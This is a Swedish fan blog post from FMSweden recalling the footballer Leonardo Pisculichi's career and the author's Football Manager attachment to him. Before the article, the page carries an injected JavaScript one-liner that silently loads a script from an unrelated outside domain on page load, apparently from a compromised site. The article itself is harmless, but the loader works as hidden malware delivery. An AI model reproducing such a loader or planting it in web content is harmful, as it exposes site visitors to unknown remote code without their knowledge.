;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lirare vi minns – Leonardo Pisculichi – FMSweden
Meny Stäng

Lirare vi minns – Leonardo Pisculichi

Den här gången är det dags för en personlig favorit. Det kanske inte är många som minns den kreativa offensiva yttern Leonardo Pisculichi, men han var en av dom jag alltid värvade till mina lag från Argentinos i den argentinska ligan. Han blev en så pass stor favorit hos mig så när han gick till Mallorca i Spanien 2006 så följde jag Mallorca slaviskt den säsongen. Det gick så långt att när min familj var och semestrade i Mallorca så gick jag och min pappa och såg en match med Mallorca och jag köpte en tröja som jag tryckte Pisculichis namn på. Han hade varit en fin talang på Football Manager när han var kvar i Argentinos och jag var övertygad om att han skulle bli en stjärna. Jag hade hittat en spelare, sett honom live och hade en tröja med honom innan han blev bäst i världen. Det var något att kunna skryta om för kompisarna.

Problemet var ju bara att han inte blev det. Det lilla problemet i min storslagna plan. Det blev bara en säsong i Spanien innan flyttlasset gick till Qatar och Al-Arabi. Där blev han kvar i fem säsonger. Visst gjorde han imponerande 67 mål på 127 matcher och han kämpade tappert men förgäves för att få representera Qatar i landslagsfotboll men han försvann från min radar efter den flytten. Idag är han tillbaka i spansk fotboll. En 36-årig Leonardo Pisculichi spelar numera i Burgos och det gör att klubben för min nästa save är given.

Please wait...

Liknande Inlägg

2 kommentarer

Lämna ett svar